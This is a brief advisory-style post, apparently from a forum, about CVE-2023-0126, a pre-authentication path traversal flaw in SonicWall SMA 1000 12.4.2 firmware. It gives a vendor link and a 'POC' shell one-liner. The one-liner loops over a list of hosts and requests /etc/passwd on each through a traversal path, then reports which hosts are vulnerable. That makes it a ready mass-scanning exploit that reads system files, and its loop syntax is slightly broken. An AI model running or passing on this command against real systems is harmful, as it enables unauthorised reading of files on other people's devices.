Remote Pre-Authentication Path Traversal Vulnerability in SMA 1000 12.4.2 Firmware

[Братислава]

Overview​

SonicWall Secure Mobile Access (SMA) 1000 series (12.4.2 firmware only) contains a pre-authentication path traversal vulnerability (CVE-2023-0126)

https://www.sonicwall.com/support/product-notification/pre-authentication-path-traversal-vulnerability-in-sma-1000-12-4-2-firmware/230109214920160/

POC: cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done